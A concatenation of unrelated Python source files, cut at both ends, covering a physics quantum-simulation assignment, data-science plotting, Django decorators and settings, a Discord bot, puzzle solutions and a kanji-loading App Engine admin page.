nms510AlarmCfgIdentifier=nms510AlarmCfgIdentifier, nms510AlarmCfgCountWindow=nms510AlarmCfgCountWindow, nms510DiagSendCode=nms510DiagSendCode, nms510DiagTestReset=nms510DiagTestReset, nms510DiagExcEntry=nms510DiagExcEntry, nms510DiagCfgTable=nms510DiagCfgTable, nms510EEChkSumErrAlm=nms510EEChkSumErrAlm, nms510AlarmCfgThreshold=nms510AlarmCfgThreshold, nms510DiagTestStatus=nms510DiagTestStatus, nms510DiagIntLineloop=nms510DiagIntLineloop, nms510FpTestAlm=nms510FpTestAlm, nms510DiagBlockErrors=nms510DiagBlockErrors, nms510ExtPortCtrlOut2=nms510ExtPortCtrlOut2, nms510DiagExcTable=nms510DiagExcTable, nms510RXDLossAlm=nms510RXDLossAlm, nms510DCDLossAlm=nms510DCDLossAlm, nms510AlarmCfgIndex=nms510AlarmCfgIndex)
|
'''
Kaya Baber
Physics 440 - Computational Physics
Assignment 4 - Quantum Simulations
Exploration 1
'''
import numpy as np
from numpy import linalg as LA
import matplotlib.pyplot as plt
import math
def make_banded(N):
stepSize = 1.0/N
N-=2 #we reduce N by 2 because we aren't using the outer ring of indicies
bandTopBot = [1.0/ (stepSize**2)]*(N-1)
bandMid = [-2.0/ (stepSize**2)]*N
banded = np.diag(bandMid)
banded = np.add(banded,np.diag(bandTopBot,1))
banded = np.add(banded,np.diag(bandTopBot,-1))
return banded
#continue from exploration 1
#normalize eigan vectors
def normalize(psi):
#takes in eigan vector and normalizes it
psiSqr = psi**2 #square eigan vector points
#use trap rule to integrate over x
psiSqrSum = np.sum(psiSqr) / (2.* (len(psi)-1) ) #sum up all points and divide by 2 times number of intervals 2(N-1)
normConst = psiSqrSum ** (1./2.) #take square root of integral
psiNorm = psi / normConst #divide all eigan vector points by the square root
return psiNorm
def V(x,V0): #potential function
#V'(x) = V_0*exp(-256*x^2)
#V_0 = E_0 / 10.0
vOut = V0*math.exp(-256*(x**2))
return vOut
def perturb(psi,x,V,V0):
#integrate over x to get delta_E
psiSqr = psi**2 #square normalized eigan vector points
for i in range(len(psi)):
psiSqr[i] = psiSqr[i]*V(x[i],V0) #multiply squared points by V'(x)
#use trap rule to integrate over x
psiSqrSum = np.sum(psiSqr) / (2.* (len(psi)-1) ) #sum up all points and divide by 2 times number of intervals 2(N-1)
deltaE=psiSqrSum #the change in energy is the integral
return deltaE
N=65
banded = make_banded(N)
x=np.linspace(-0.5,0.5,N) #positions
xArraySub=x[1:-1]
eiganVal, eiganVect=LA.eig(banded) #compute eigan vectors and values
numVectors = 50
psiArray=[]
deltaEArray=[]
for i in range(numVectors): #constructs array of eigan vectors
psi=np.insert(eiganVect[:,i],0 ,0)
psi=np.append(psi,0)
psi=normalize(psi)
psiArray.append(psi)
psiNormArray=[]
for p in psiArray:
psiNorm = normalize(p)
psiNormArray.append(psiNorm)
for i in range(40,numVectors):
psi=np.insert(eiganVect[:,i],0 ,0)
psi=np.append(psi,0)
plt.plot(x, psi)
plt.ylabel("Psi")
plt.xlabel("Position (x)")
plt.title("Unperturbed")
plt.grid()
plt.savefig('Assignment_4_quantum_simulation/plots/1eiganVect'+str(i)+'.png',bbox_inches='tight')
#plt.show()
plt.clf()
V0=eiganVal[40] / 10.0 #GROUND STATE CHANGES WITH N, RECHECK EACH TIME
deltaEArray
for p in psiNormArray:
deltaE=perturb(p,x,V,V0)
deltaEArray.append(deltaE)
newEnergy = np.add(deltaEArray,eiganVal[:numVectors])
vArray=[]
for i in xArraySub:
vArray.append(V(i,V0))
Vdiag=np.diag(vArray)
H = np.add(Vdiag,banded)
eiganValH, eiganVect=LA.eig(H)
eiganVect[:,40] = - eiganVect[:,40]
psiArray=[]
for i in range(40,numVectors): #constructs array of eigan vectors
psi=np.insert(eiganVect[:,i],0 ,0)
psi=np.append(psi,0)
psi=normalize(psi)
psiArray.append(psi)
plt.plot(x, psi)
plt.ylabel("Psi")
plt.xlabel("Position (x)")
plt.title("V_0 = 10% of Ground State Energy")
plt.grid()
plt.savefig('Assignment_4_quantum_simulation/plots/2AeiganVect'+str(i)+'.png',bbox_inches='tight')
#plt.show()
plt.clf()
V0=eiganVal[40] #GROUND STATE CHANGES WITH N, RECHECK EACH TIME
deltaEArray=[]
for p in psiNormArray:
deltaE=perturb(p,x,V,V0)
deltaEArray.append(deltaE)
newEnergy2 = np.add(deltaEArray,eiganVal[:numVectors])
vArray=[]
for i in xArraySub:
vArray.append(V(i,V0))
Vdiag=np.diag(vArray)
H = np.add(Vdiag,banded)
eiganValH2, eiganVect=LA.eig(H)
psiArray=[]
for i in range(40,numVectors): #constructs array of eigan vectors
psi=np.insert(eiganVect[:,i],0 ,0)
psi=np.append(psi,0)
psi=normalize(psi)
psiArray.append(psi)
plt.plot(x, psi)
plt.ylabel("Psi")
plt.xlabel("Position (x)")
plt.title("V_0 = Ground State Energy")
plt.grid()
plt.savefig('Assignment_4_quantum_simulation/plots/2BeiganVect'+str(i)+'.png',bbox_inches='tight')
#plt.show()
plt.clf()
print "V0 = 10 % of Groundstate\nPertubation Theory:"
print np.array(newEnergy[40:])
print "Computed:"
print eiganValH[40:50]
print "Difference:"
print np.substract(np.array(newEnergy[40:]),eiganValH[40:50])
print "V0 = Groundstate\nPertubation Theory:"
print np.array(newEnergy2[40:])
print "Computed:"
print eiganValH2[40:50]
print "Difference:"
print np.subtract(np.array(newEnergy2[40:]),eiganValH2[40:50])
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Nov 1 16:32:44 2018
@author: dawnstear
"""
import numpy as np
import pandas as pd
from utils import Data
from dimred import DimensionReduction
'''
import pyqtgraph as pg
from pyqtgraph.Qt import QtGui, QtCore
pg.setConfigOption('leftButtonPan', False) # set for mac users only,,, put in __main__?
## Switch to using white background and black foreground
pg.setConfigOption('background', 'w')
#pg.setConfigOption('foreground', 'k')
'''
''' find out how button/lists work to do drop down choiceof dim/red and make that plot it'''
win1=1
win2=0
win3=0
data1k = pd.read_csv('/Users/dawnstear/desktop/Mid_Atlantic_Poster/sc_data/n_1078/data.csv')
print(np.shape(data1k))
celltypes = data1k['TYPE'] # save cell type vector in case we need it later
labels = data1k['Labels'] # save labels
data_ = data1k.drop(['Labels','TYPE'],axis=1)
cellcount, genecount = np.shape(data_)
X = data_
y = labels
Utils = Data(X,y)
dr = DimensionReduction(X,y,dataset='1,078')
#pca_data = dr.pca(n_components=2)
lle_data = dr.lle()
'''
# Overhead code
app = QtGui.QApplication([])
mw = QtGui.QMainWindow()
mw.resize(800,800)
view = pg.GraphicsLayoutWidget() ## GraphicsView with GraphicsLayout inserted by default
mw.setCentralWidget(view)
mw.show()
mw.setWindowTitle('Single-Cell RNA-seq scatter plot')
n = 50
## Make all plots clickable
lastClicked = []
def clicked(plot, points):
global lastClicked
for p in lastClicked:
p.resetPen()
print("clicked points", points)
for p in points:
p.setPen('b', width=2)
lastClicked = points
if win1:
# Add plot to GraphicsLayoutWidget
w1 = view.addPlot()
# Add Scatter plot to GraphicsLayoutWidget
s1 = pg.ScatterPlotItem(size=20, pen=pg.mkPen(None),
brush=pg.mkBrush(255, 255, 255, 80))
pos = np.random.normal(size=(2,n), scale=1e-5)
spots = [{'pos': pos[:,i], 'data': 1} for i in range(n)] + [{'pos': [0,0], 'data': 1}]
s1.addPoints(spots)
w1.addItem(s1)
# Add label to GraphicsLayoutWidget
l1 = view.addLabel('CELLS',row=10,col=20)
s1.sigClicked.connect(clicked)
if win2:
w2 = view.addPlot()
s2 = pg.ScatterPlotItem(size=10, pen=pg.mkPen('w'), pxMode=True)
pos = np.random.normal(size=(2,n), scale=1e-5)
spots = [{'pos': pos[:,i], 'data': 1, 'brush':pg.intColor(i, n),
'symbol': i%5, 'size': 5+i/10.} for i in range(n)]
s2.addPoints(spots)
w2.addItem(s2)
s2.sigClicked.connect(clicked)
if win3:
w3 = view.addPlot()
s3 = pg.ScatterPlotItem(pxMode=False) ## Set pxMode=False to allow spots to transform with the view
spots3 = []
for i in range(10):
for j in range(10):
spots3.append({'pos': (1e-6*i, 1e-6*j), 'size': 1e-6, 'pen': {'color': 'w', 'width': 2}, 'brush':pg.intColor(i*10+j, 100)})
s3.addPoints(spots3)
w3.addItem(s3)
s3.sigClicked.connect(clicked)
## Start Qt event loop unless running in interactive mode.
if __name__ == '__main__':
import sys
if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
QtGui.QApplication.instance().exec_()
''' |
# -*- coding: utf-8 -*-
from functools import wraps
from datetime import timedelta
from .models import DataPresence, HitViewByUser
from django.utils import timezone
from django.utils.decorators import available_attrs
from django.db.models import F
def bdg_data_presence(view_func):
@wraps(view_func, assigned=available_attrs(view_func))
def _login_wrapped_view(request, *args, **kwargs):
if request.user.is_authenticated():
data_presence, created = DataPresence.objects.get_or_create(user=request.user)
today = timezone.now().date()
yesterday = today - timedelta(days=1)
if data_presence.last_login != today:
data_presence.number_days = F('number_days') + 1
if data_presence.last_login == yesterday:
data_presence.consecutive_days = F('consecutive_days') + 1
else:
data_presence.consecutive_days = 1
data_presence.last_login = today
data_presence.save()
return view_func(request, *args, **kwargs)
return _login_wrapped_view
def calculate_hit_by_user(view_name):
def decorator(view_func):
@wraps(view_func, assigned=available_attrs(view_func))
def _hit_wrapped_view(request, *args, **kwargs):
if request.user.is_authenticated():
data_view, created = HitViewByUser.objects.get_or_create(user=request.user,
view_name=view_name)
today = timezone.now().date()
if data_view.date_last_hit != today:
data_view.hits = F('hits') + 1
data_view.date_last_hit = today
data_view.save()
return view_func(request, *args, **kwargs)
return _hit_wrapped_view
return decorator
|
class OrkgResponse(object):
@property
def succeeded(self):
return str(self.status_code)[0] == '2'
def __init__(self, response):
self.status_code = response.status_code
self.content = response.json()
self.url = response.url
|
"""
Solutions for day 6 of 2020's Advent of Code
"""
def part_a(data) -> int:
"""
Solution for part a
Parameters
----------
data: str
Returns
-------
answer: int
"""
groups = data.split('\n\n')
as_one = (group.replace('\n', '') for group in groups)
unique = (set(group) for group in as_one)
return sum(len(group) for group in unique)
def part_b(data, **_) -> int:
"""
Solution for part b
Parameters
----------
data: str
Returns
-------
answer: int
"""
groups = data.split('\n\n')
sub_groups = ((set(g) for g in group.split('\n')) for group in groups)
intersections = (set.intersection(*groups) for groups in sub_groups)
return sum(len(intersection) for intersection in intersections)
|
import unittest
from neural_bezier.dataset import BezierDataset
class BezierDatasetTest(unittest.TestCase):
def test_iter_seed(self):
dataset = iter(BezierDataset(length=16, size=128))
params, img = next(dataset)
self.assertEqual((10,), params.shape)
self.assertEqual((128, 128), img.shape)
|
"""
Imports
"""
from .datacontroller import UserStore, QuestionStore, AnswerStore
store = UserStore()
questionstore = QuestionStore()
answerstore = AnswerStore()
|
"""Phish Stats"""
from . import utils
# from .models import Show, Collection
from .show import Show
from .collection import Collection
|
# r1
import csv
import logging
from helpers.save.data_saver import DataSaver
logger = logging.getLogger('ddd_site_parse')
class DataSaverCSV(DataSaver):
def __init__(self, params: {}):
super().__init__(params)
self.ext = 'csv'
self.newline = params.get('newline', '')
self.csv_delimiter = params.get('csv_delimiter', ';')
def _save(self, data: [], data_fields: [], output_path: str, params: {}) -> None:
with open(output_path, 'w', newline=self.newline, encoding=self.encoding) as output:
writer = csv.writer(output, delimiter=self.csv_delimiter)
self._check_data_fields(data, data_fields)
for row in data:
try:
writer.writerow([row[field] for field in data_fields])
except UnicodeEncodeError as e:
logging.debug(f'[E: {e}] Write row error, trying fix encoding: [{row}]')
DataSaver.fix_row_encoding(row, self.encoding)
writer.writerow([row[field] for field in data_fields])
|
from flask_security.forms import LoginForm
class BabelLoginForm(LoginForm):
pass
|
#25adecimal (vquex)
ls = '0123456789ABCDEFGHIJKLMNO'
e = 0
p = 0
t = int(raw_input('to vquex: '))
r = t % 25
q = t / 25
while p < q:
e += 1
p += 1
print str(e) + ls[r]
|
# AUTOGENERATED! DO NOT EDIT! File to edit: nbs/05a_inference_anime_heads.ipynb (unless otherwise specified).
__all__ = []
# Cell
import torch
import matplotlib.pyplot as plt
from fastcore.all import *
from .torch_utils import Normalizer
from .data_anime_heads import Tokenizer
from .model import Anime_Export
# Internal Cell
normalizer = Normalizer()
tokenizer = Tokenizer()
# Internal Cell
def decode_img(img):
"img: (bs, 3, _, _), returns: (bs, _, _, 3)"
imgs = normalizer.decode(img).permute(0, 2, 3, 1).cpu()
return imgs
# Internal Cell
def get_attn_w(model):
"return: (bs, seq_len, w, h)"
attn_w = model.g_net.gs_attn[-1].conv[0].attn_w # (bs, h, w, seq_len)
return attn_w.permute(0, 3, 1, 2) # (bs, seq_len, h, w)
# Cell
@patch
@torch.no_grad()
def predict(self: Anime_Export, cap):
''' cap: 'white hair yellow eyes'
returns: img: (64, 64, 3), attn_w: (2, 64, 64) '''
cap, cap_len = tokenizer.encode(cap)
cap = torch.tensor([cap])
cap_len = torch.tensor([cap_len])
self.eval()
img = self.forward(cap, cap_len)
# img = self.small_forward(cap, cap_len)
img = decode_img(img)
attn_w = get_attn_w(self)
return img[0], attn_w[0]
# Internal Cell
def show_pred(img, cap):
fig, ax = plt.subplots(nrows=1, ncols=1, figsize=(2, 2))
ax.imshow(img)
ax.set_title(cap)
# Internal Cell
def show_pred_withattn(img, attn_w, cap):
''' img: (64, 64, 3), attn_w: (2, 64, 64), cap: 'white hair yellow eyes' '''
tags = [' '.join(cap.split()[:2]), ' '.join(cap.split()[2:])]
fig, ax = plt.subplots(nrows=1, ncols=3, figsize=(6, 2))
axs = ax.flatten()
axs[0].imshow(img)
axs[1].set_title(tags[0])
axs[1].imshow(attn_w[0])
axs[2].set_title(tags[1])
axs[2].imshow(attn_w[1])
# Cell
@patch
def pred_and_show(self: Anime_Export, cap, with_attn=False):
"cap: 'white hair yellow eyes' "
img, attn_w = self.predict(cap)
show_pred_withattn(img, attn_w, cap) if with_attn else show_pred(img, cap) |
#!/usr/bin/env python
import os
import os.path as osp
import gc
import time
from mpi4py import MPI
import matplotlib.pyplot as plt
import pprint
import argparse
import pyathena as pa
from ..util.split_container import split_container
from ..plt_tools.make_movie import make_movie
if __name__ == '__main__':
movie = False
COMM = MPI.COMM_WORLD
#basedir_def = '/tigress/jk11/TIGRESS-NCR/R8_8pc_NCR_test6/'
#basedir_def = '/perseus/scratch/gpfs/jk11/TIGRESS-NCR/LGR4_4pc_NCR_oldvl/'
#basedir_def = '/tigress/changgoo/TIGRESS-NCR/R8_4pc_NCR.cori'
basedir_def = '/tigress/jk11/TIGRESS-NCR/R8_4pc_NCR.cori'
#basedir_def = '/tigress/jk11/TIGRESS-NCR/LGR4_2pc_NCR.cori'
#basedir_def = '/tiger/scratch/gpfs/jk11/TIGRESS-NCR/LGR4_4pc_NCR'
# savdir = '/tigress/jk11/tmp4/'
# savdir_pkl = '/tigress/jk11/tmp3/'
savdir = None
savdir_pkl = None
parser = argparse.ArgumentParser()
parser.add_argument('-b', '--basedir', type=str,
default=basedir_def,
help='Name of the basedir.')
args = vars(parser.parse_args())
locals().update(args)
s = pa.LoadSimTIGRESSNCR(basedir, verbose=False)
nums = s.nums[::5]
if COMM.rank == 0:
print('basedir, nums', s.basedir, nums)
nums = split_container(nums, COMM.size)
else:
nums = None
mynums = COMM.scatter(nums, root=0)
print('[rank, mynums]:', COMM.rank, mynums)
time0 = time.time()
for num in mynums:
print(num, end=' ')
# # prj = s.read_prj(num, force_override=False)
# # slc = s.read_slc(num, force_override=False)
# try:
# fig = s.plt_snapshot(num, savdir_pkl=savdir_pkl, savdir=savdir)
# plt.close(fig)
# fig = s.plt_pdf2d_all(num, plt_zprof=False, savdir_pkl=savdir_pkl, savdir=savdir)
# plt.close(fig)
# except KeyError:
# fig = s.plt_snapshot(num, savdir_pkl=savdir_pkl, savdir=savdir, force_override=True)
# plt.close(fig)
# fig = s.plt_pdf2d_all(num, plt_zprof=False, savdir_pkl=savdir_pkl, savdir=savdir, force_override=True)
# plt.close(fig)
# n = gc.collect()
# print('Unreachable objects:', n, end=' ')
# print('Remaining Garbage:', end=' ')
# pprint.pprint(gc.garbage)
print('read_H2eq', end=' ')
r = s.read_H2eq(num, force_override=False)
n = gc.collect()
print('Unreachable objects:', n, end=' ')
print('Remaining Garbage:', end=' ')
pprint.pprint(gc.garbage)
# Make movies
if COMM.rank == 0 and movie:
fin = osp.join(s.basedir, 'snapshots/*.png')
fout = osp.join(s.basedir, 'movies/{0:s}_snapshots.mp4'.format(s.basename))
make_movie(fin, fout, fps_in=15, fps_out=15)
from shutil import copyfile
copyfile(fout, osp.join('/tigress/jk11/public_html/movies',
osp.basename(fout)))
COMM.barrier()
if COMM.rank == 0:
print('')
print('################################################')
print('# Do tasks')
print('# Execution time [sec]: {:.1f}'.format(time.time()-time0))
print('################################################')
print('')
|
from typing import Awaitable, Callable, Union
from dis_snek.models.discord_objects.role import Role
from dis_snek.models.snowflake import Snowflake_Type, to_snowflake
from dis_snek.models.context import Context
TYPE_CHECK_FUNCTION = Callable[[Context], Awaitable[bool]]
def has_role(role: Union[Snowflake_Type, Role]) -> TYPE_CHECK_FUNCTION:
"""
Check if the user has the given role
Args:
role: The Role or role id to check for
"""
async def check(ctx: Context) -> bool:
if ctx.guild is None:
return False
return ctx.author.has_role(role)
return check
def has_any_role(*roles: Union[Snowflake_Type, Role]) -> TYPE_CHECK_FUNCTION:
"""
Checks if the user has any of the given roles
Args:
*roles: The Role(s) or role id(s) to check for
"""
async def check(ctx: Context) -> bool:
if ctx.guild is None:
return False
if any(ctx.author.has_role(to_snowflake(r)) for r in roles):
return True
return False
return check
def has_id(user_id) -> TYPE_CHECK_FUNCTION:
"""
Checks if the author has the desired ID.
parameters:
coro: the function to check
"""
async def check(ctx: Context) -> bool:
return ctx.author.id == user_id
return check
def is_owner() -> TYPE_CHECK_FUNCTION:
"""
Is the author the owner of the bot.
parameters:
coro: the function to check
"""
async def check(ctx: Context) -> bool:
if ctx.bot.app.team:
return ctx.bot.app.team.is_in_team(ctx.author.id)
return ctx.author.id == ctx.bot.owner.id
return check
def guild_only() -> TYPE_CHECK_FUNCTION:
"""
This command may only be ran in a guild
"""
async def check(ctx: Context) -> bool:
return ctx.guild is not None
return check
def dm_only() -> TYPE_CHECK_FUNCTION:
"""
This command may only be ran in a dm
"""
async def check(ctx: Context) -> bool:
return ctx.guild is None
return check
|
import discord
from discord_components import DiscordComponents
from discord.ext import commands
from dotenv import load_dotenv
import os
load_dotenv()
# global settings
bot = commands.Bot(command_prefix=commands.when_mentioned, description='poe trade bot!')
DiscordComponents(bot)
cogs_folder = 'cogs'
@bot.event
async def on_ready():
print('Logged in as')
print(f'username: {bot.user.name}')
print(f'id: {bot.user.id}')
print('------' * 5)
load_cogs()
print('------' * 5)
@bot.event
async def on_command_error(ctx, error):
await ctx.send('嘔幹!你在亂打三小拉!\n可以使用 help 指令來查看可用指令。')
await ctx.send(f"錯誤訊息:\n{error}")
def load_cogs():
for filename in os.listdir(cogs_folder):
if filename.endswith('.py'):
extension = filename[:-3]
try:
bot.load_extension(f'cogs.{extension}')
print('Success to load extension {}'.format(extension))
except Exception as e:
exc = '{}: {}'.format(type(e).__name__, e)
print('Failed to load extension {}\n{}'.format(extension, exc))
bot.run(os.getenv("TOKEN"))
|
from PLC.Faults import *
from PLC.Method import Method
from PLC.Parameter import Parameter, Mixed
from PLC.BootStates import BootState, BootStates
from PLC.Auth import Auth
class GetBootStates(Method):
"""
Returns an array of all valid node boot states.
"""
roles = ['admin', 'pi', 'user', 'tech', 'node']
accepts = [
Auth()
]
returns = [BootState.fields['boot_state']]
def call(self, auth):
return [boot_state['boot_state'] for boot_state in BootStates(self.api)]
|
# -*- coding:utf-8 -*-
#
# Author : TangHanYi
# E-mail : thydeyx@163.com
# Create Date : 16-10-28 16:06:01
# File Name : Word_Search.py
# Desc :
class Solution(object):
def dfs(self, board, x, y, word, i):
if i == self.w_l:
return True
if x < 0 or y < 0 or x >= self.n or y >= self.m or ord(board[x][y]) != ord(word[i]):
return False
board[x][y] = chr((ord(board[x][y]) ^ 255))
ret = self.dfs(board, x + 1, y, word, i + 1) or self.dfs(board, x -1 ,y, word, i + 1) or self.dfs(board, x, y + 1, word, i + 1) or self.dfs(board, x, y - 1, word, i + 1)
board[x][y] = chr((ord(board[x][y]) ^ 255))
return ret
def exist(self, board, word):
self.w_l = len(word)
if self.w_l < 0:
return True
self.n = len(board)
if self.n == 0:
return False
self.m = len(board[0])
if self.m == 0:
return False
for i in range(self.n):
for j in range(self.m):
if self.dfs(board, i, j, word, 0) == True:
return True
return False
if __name__ == "__main__":
s = Solution()
board = [
['A','B','C','E'],
['S','F','C','S'],
['A','D','E','E']
]
word = ["ABCCED", "SEE", "ABCB"]
for w in word:
print s.exist(board, w)
|
import cgi
import os
import sys
import wsgiref.handlers
import datetime
from google.appengine.api import users
from google.appengine.ext import db
from google.appengine.ext import webapp
from google.appengine.ext.webapp import template
from google.appengine.ext.db import djangoforms
# Helper Classes
from xml.dom.minidom import parse, Node
from kanji import Kanji
from statistics import Statistics
import mugenjiForms, mugenjiUsers
import mugenjiDb
class AdminPage(webapp.RequestHandler):
def get(self):
reqLevel = self.request.get("level")
greeting = mugenjiUsers.User().greeting()
isAdmin = mugenjiUsers.User().isAdmin()
isLoggedIn = mugenjiUsers.User().isLoggedIn()
user = None
if isLoggedIn:
user = User().get(mugenjiUsers.User().getEmail())
try:
reqLevel = int(reqLevel)
kanjis = Kanji().fetch(reqLevel, 50)
except:
kanjis = Kanji().fetch(0, 50)
template_values = {
'isAdmin': isAdmin,
'isLoggedIn': isLoggedIn,
'user': user,
'greeting': greeting,
'kanjis': kanjis
}
path = os.path.join(os.path.dirname(__file__), '..', 'templates', 'admin', 'admin.html')
self.response.out.write(template.render(path, template_values))
class AdminLoadPage(webapp.RequestHandler):
def getText(self, nodeList):
t = []
for node in nodeList:
if node.nodeType == node.TEXT_NODE:
t.append(node.data)
return ''.join(t)
def get(self):
greeting = mugenjiUsers.User().greeting()
isAdmin = mugenjiUsers.User().isAdmin()
isLoggedIn = mugenjiUsers.User().isLoggedIn()
user = None
if isLoggedIn:
user = User().get(mugenjiUsers.User().getEmail())
# dom1 = parse(os.path.join(os.path.dirname(__file__), '..', 'data', 'kanjidic2.xml'))
dom1 = parse(os.path.join(os.path.dirname(__file__), '..', 'data', 'test.xml'))
characters = dom1.getElementsByTagName('character')
levelCount = {1:0,2:0,3:0,4:0,5:0}
for character in characters:
kanjiName = None
onYomi = None
kunYomi = None
meaning = None
strokes = None
note = None
jlptLevel = None
for param in character.childNodes:
if param.nodeType == Node.ELEMENT_NODE:
if param.localName == 'literal':
kanjiName = self.getText(param.childNodes)
elif param.localName == 'misc':
for p in param.childNodes:
if p.localName == 'stroke_count':
strokes = int(self.getText(p.childNodes))
if p.localName == 'jlpt':
jlptLevel = int(self.getText(p.childNodes))
elif param.localName == 'reading_meaning':
for p in param.childNodes:
if p.localName == 'rmgroup':
m = []
o = []
k = []
for p2 in p.childNodes:
if p2.localName == 'meaning' and not p2.attributes.keys():
m.append(self.getText(p2.childNodes))
if p2.localName == 'reading' and p2.attributes['r_type']:
if p2.attributes['r_type'].value == 'ja_on':
o.append(self.getText(p2.childNodes))
if p2.localName == 'reading' and p2.attributes['r_type']:
if p2.attributes['r_type'].value == 'ja_kun':
k.append(self.getText(p2.childNodes))
meaning = ', '.join(m)
onYomi = ', '.join(o)
kunYomi = ', '.join(k)
Kanji().put(kanjiName, meaning, strokes, jlptLevel, onYomi, kunYomi)
if jlptLevel in levelCount:
levelCount[jlptLevel] = levelCount[jlptLevel] + 1
for n, v in levelCount.items():
Statistics().put('levelCount'+str(n), v)
template_values = {
'isAdmin': isAdmin,
'isLoggedIn': isLoggedIn,
'user': user,
'greeting': greeting,
}
self.redirect('/admin/admin')
class AdminDeletePage(webapp.RequestHandler):
def get(self):
results = Kanji().fetch(0)
for result in results:
result.delete()
self.redirect('/admin/admin')
|
"""Basic settings for EveryVoter project"""
# pylint: disable=invalid-name
import os
import environ
env = environ.Env(
DEBUG=(bool, False),
ALLOWED_HOSTS=(list, []),
APP_NAME=(str, 'everyvoter-default'),
TIME_ZONE=(str, 'US/Eastern'),
LANGUAGE_CODE=(str, 'en-us'),
KEY_PREFIX=(str, ''),
CSRF_COOKIE_NAME=(str, 'everyvoter_csrftoken'),
SESSION_COOKIE_NAME=(str, 'everyvoter_sessionid'),
SESSION_ENGINE=(str, 'django.contrib.sessions.backends.cached_db'),
SESSION_SERIALIZER=(
str, 'django.contrib.sessions.serializers.JSONSerializer'),
SESSION_EXPIRE_AT_BROWSER_CLOSE=(bool, False),
SESSION_COOKIE_SECURE=(bool, False),
SESSION_COOKIE_AGE=(int, 31536000),
AWS_ACCESS_KEY_ID=(str, ''),
AWS_SECRET_ACCESS_KEY=(str, ''),
AWS_DEFAULT_REGION=(str, 'us-east-1'),
DEFAULT_FROM_EMAIL=(str, 'app@everyvoter.us'),
EMAIL_ACTIVE=(bool, False),
SES_FEEDBACK_TOPIC_ARN=(str, ''),
HIREFIRE_TOKEN=(str, ''),
HIREFIRE_QUEUES=(list, ['default', 'bulk', 'bulk_priority', 'user_import',
'high_memory', 'feedback']),
DEMOCRACY_WORKS_API_KEY=(str, ''),
DEMOCRACY_WORKS_API_URL=(str, 'http://127.0.0.1:8000/'),
DEBUG_TOOLBAR_IPS=(list, ['127.0.0.1']),
CORS_ORIGIN_REGEX_WHITELIST=(list, []),
CORS_ORIGIN_WHITELIST=(list, ['localhost:8000', '127.0.0.1:8000']),
SES_CONFIGURATIONSET_NAME=(str, 'everyvoter'),
SECURE_SSL_REDIRECT=(bool, False)
)
BASE_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__), '../../'))
####
# Secret Key Settings
SECRET_KEY = env('SECRET_KEY')
####
# Core Application Settings
DEBUG = env('DEBUG')
ROOT_URLCONF = 'everyvoter.urls'
WSGI_APPLICATION = 'everyvoter.wsgi.application'
ALLOWED_HOSTS = env('ALLOWED_HOSTS')
SECURE_SSL_REDIRECT = env('SECURE_SSL_REDIRECT')
#####
# Application name (i.e. `everyvoter-prod`, `everyvoter-staging`, etc)
APP_NAME = env('APP_NAME')
####
# Database Settings
DATABASES = {
'default': env.db(),
}
#####
# Cache Settings
# Attempt to get the memcache info from Heroku.
try:
# `django-heroku-memcachify` requires memcache to work. Since we only
# need it on heroku and don't want to require libmemcached on dev
# machines, we'll only use it if it's installed
from memcacheify import memcacheify
default_cache = memcacheify()['default']
# memcacheify will use the LocMemCache if there is no heroku cache. So if
# we see the 'LocMemCache' we know that memcachify is not running on a
# heroku dyno that is setup for memcached
# pylint: disable=line-too-long
if default_cache['BACKEND'] == 'django.core.cache.backends.locmem.LocMemCache':
default_cache = env.cache()
except ImportError:
# If `django-heroku-memcachify` is not installed, just use the cache
# defined in the environment
default_cache = env.cache()
CACHES = {
'default': default_cache,
}
KEY_PREFIX = env('KEY_PREFIX')
####
# Installed Apps Settings
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'corsheaders',
'rest_framework',
'django_filters',
'crispy_forms',
'django_celery_results',
'django_celery_beat',
# `django.contrib.auth` has to be after `accounts` because we override
# `django.contrib.auth` management commands.
'accounts',
'django.contrib.auth',
'manage',
'api',
'location',
'branding',
'election',
'blocks',
'geodataset',
'mailer',
'feedback',
'staff',
'notifications',
'user_import',
'democracy_consumer',
'everyvoter_common',
'rawpaginator',
'hirefire',
'collectfast',
'django.contrib.staticfiles',
'django_nose',
'clear_cache',
'sekizai',
'debug_toolbar'
]
MIDDLEWARE = [
'debug_toolbar.middleware.DebugToolbarMiddleware',
'django.middleware.security.SecurityMiddleware',
'branding.middleware.BrandingMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'accounts.middleware.NewRelicUserMiddleware',
'manage.middleware.RestrictAdminMiddleware',
]
####
# Template settings
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
'templates'
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'sekizai.context_processors.sekizai',
'branding.context_processors.organization.organization'
]
},
},
]
####
# Custom authentication model setting
AUTH_USER_MODEL = 'accounts.User'
AUTHENTICATION_BACKENDS = (
'branding.auth_backends.BrandedBackend',)
####
# Authentication
LOGIN_URL = '/manage/login/'
####
# Session & CSRF Settings
CSRF_COOKIE_NAME = env('CSRF_COOKIE_NAME')
SESSION_COOKIE_NAME = env('SESSION_COOKIE_NAME')
SESSION_ENGINE = env('SESSION_ENGINE')
SESSION_SERIALIZER = env('SESSION_SERIALIZER')
SESSION_EXPIRE_AT_BROWSER_CLOSE = env('SESSION_EXPIRE_AT_BROWSER_CLOSE')
SESSION_COOKIE_AGE = env('SESSION_COOKIE_AGE')
####
# Password validation
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.'
'UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.'
'MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.'
'CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.'
'NumericPasswordValidator',
},
]
####
# File Upload Handling
FILE_UPLOAD_HANDLERS = [
'django.core.files.uploadhandler.TemporaryFileUploadHandler',
]
####
# API Settings
REST_FRAMEWORK = {
